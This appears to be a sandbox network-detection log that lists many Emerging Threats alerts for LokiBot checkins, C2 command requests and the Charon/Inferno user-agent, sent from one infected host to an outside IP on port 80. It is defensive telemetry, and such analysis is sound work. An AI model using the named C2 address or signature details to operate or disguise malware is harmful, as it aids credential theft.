Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.042075
SID:	2021641
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.115114
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:43.454363
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:33.437852
SID:	2021641
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.018070
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:54.422589
SID:	2024318
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.998033
SID:	2025381
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.096160
SID:	2024313
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.112021
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.891670
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:32.673178
SID:	2024313
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.124910
SID:	2825766
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:15.463121
SID:	2825766
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:25.556361
SID:	2024313
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.112021
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:42.736556
SID:	2825766
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:41.966393
SID:	2024313
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.206380
SID:	2024318
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.895022
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:25.556361
SID:	2024318
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:41.966393
SID:	2024318
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.035047
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:43.503603
SID:	2025381
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.206380
SID:	2024313
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:17.815577
SID:	2025381
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:32.673178
SID:	2024318
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.860100
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.860100
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:04.359604
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:33.437852
SID:	2825766
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:44.242163
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.220105
SID:	2021641
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:14.663983
SID:	2024313
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.018070
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:25.641172
SID:	2025381
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:46.581121
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.123133
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:04.659572
SID:	2021641
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.123133
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.999341
SID:	2021641
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:09.316933
SID:	2024313
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:47.378472
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:54.422589
SID:	2025381
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:09.316933
SID:	2024318
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:11.314149
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:28.779878
SID:	2025381
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:13.652600
SID:	2825766
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.799315
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:14.423119
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.891737
SID:	2825766
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:19.440133
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:44.242163
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:24.825007
SID:	2025381
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:31.298967
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:43.503603
SID:	2021641
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:31.298967
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:59.690030
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:21.735500
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:32.673178
SID:	2025381
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:12.357168
SID:	2024313
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:52.706701
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.906071
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:28.699735
SID:	2825766
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:50.516269
SID:	2025381
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:57.360186
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:12.357168
SID:	2024318
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.906071
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.861510
SID:	2825766
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:57.360186
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:08.980641
SID:	2825766
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.194950
SID:	2021641
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:04.359604
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:26.424765
SID:	2024318
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.846749
SID:	2025381
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:33.437852
SID:	2024318
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.133120
SID:	2021641
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.046578
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:26.424765
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.998033
SID:	2825766
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.109787
SID:	2025381
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:59.991734
SID:	2825766
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:01.279270
SID:	2825766
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.119856
SID:	2024313
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.136720
SID:	2825766
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:33.437852
SID:	2024313
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:53.470085
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:00.769505
SID:	2021641
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:47.361321
SID:	2021641
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.119856
SID:	2024318
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.115114
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.860100
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:30.339047
SID:	2825766
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.205072
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:23.301208
SID:	2825766
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:03.603579
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:44.269499
SID:	2025381
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:18.590588
SID:	2025381
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.181654
SID:	2025381
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.080334
SID:	2021641
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:09.757970
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:39.686953
SID:	2021641
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.220105
SID:	2024318
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:22.429106
SID:	2025381
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:36.516498
SID:	2021641
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.220105
SID:	2024313
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.096160
SID:	2825766
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.036927
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:59.991734
SID:	2024313
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.042075
SID:	2025381
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:59.991734
SID:	2024318
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:12.357168
SID:	2825766
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:36.488685
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.046578
SID:	2825766
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.096911
SID:	2025381
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:26.424765
SID:	2825766
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

